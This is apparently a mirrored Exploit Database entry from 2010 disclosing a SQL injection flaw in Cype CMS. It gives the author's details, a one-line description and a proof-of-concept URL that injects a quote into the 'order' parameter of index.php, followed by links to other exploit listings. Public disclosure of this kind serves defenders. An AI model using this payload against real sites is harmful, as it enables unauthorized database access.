Cype CMS – SQL Injection

Exploit Database
8 阅读

作者： Sora

日期： 2010-01-01
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/10885/

# Exploit Title: Cype Content Management System Remote SQL Injection Exploit
# Date: January 1st, 2010
# Author: Sora
# Version: Revision 241
# Tested on: Linux (Backtrack 3)

-----------------------------------------

> Cype CMS Remote SQL Injection Exploit
> Author: Sora
> Contact: vhr95zw [at] hotmail [dot] com
> Website: http://greyhathackers.wordpress.com/
> Google Dork: In your dreams, script kiddies.

# Exploit Description:
Cype CMS suffers a remote SQL injection vulnerability in index.php.

# Code/Proof of Concept (PoC):
http://server/index.php?cype=main&page=ranking&order='&job=500

last Exploits
Cype CMS – SQL Injection的更多信息

Madirish Webmail 2.01 – ‘baseDir’ Local/Remote File Inclusion：
JaxCMS 1.0 – Local File Inclusion：
PHP-Nuke 5.0 – Viewslink SQL Injection：
class.upload.php 0.30 – Arbitrary File Upload：
WordPress Plugin Motopress Hotel Booking Lite 4.2.4 – SQL Injection：
Resumes Management and Job Application Website 1.0 – Authentication Bypass：
Joomla! Component Event Booking 2.10.1 – SQL Injection：
Patient Appointment Scheduler System 1.0 – Persistent Cross-Site Scripting：